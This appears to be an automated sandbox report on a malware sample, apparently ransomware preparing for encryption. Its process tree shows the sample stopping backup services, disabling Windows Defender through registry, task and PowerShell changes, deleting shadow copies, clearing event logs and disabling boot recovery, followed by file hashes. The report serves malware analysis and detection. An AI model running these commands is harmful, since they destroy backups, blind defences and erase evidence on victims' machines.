C:\Users\Admin\AppData\Local\Temp\44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe"C:\Users\Admin\AppData\Local\Temp\44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3672 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:3208
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1176
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:2936
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:692 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:4052
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3648 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:3148
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3496 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:3772
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3764 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:2588
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:2060
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_1372d" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_1372d" /y3⤵PID:604
-
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1736
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:712
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1872
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:3812
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:3936
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:2440
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:2192
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:2524
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_1372d" start= disabled2⤵PID:2328
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1996
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:3004
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:2228
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:2924
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:2932
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:60
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1440
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1744
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:2396
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:2224
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:3996
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:3124
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:4032
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1164
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2088
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3696
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:620
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1916
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:3772
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1480
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1532
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:2056
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:3296
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:364
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1732
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:3824
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1652
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:820
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1284
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1684
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2164
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:752
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4076
-
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3924
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:832
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3340
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2128
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1104
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:320
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:3868
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1880
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:296
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:648
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1896
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1864
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1216
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5
e35cb1559a441de2aae831255028e647
SHA18f3cada79ce58e0f268fe0fffeb09b8cc321a97a
SHA2562b8f25768e38408b5fed49df9a68b1ffcf3fa0826fdb5510f711e4053ebc45c2
SHA5122dbc1f3a73b553eea2f08bd518374235971b6b06a87c349d41685d5527a2dfefad87785f452370bcfe3a1e765aa672fd1bb857a4e4d354db098abab7b50eed3a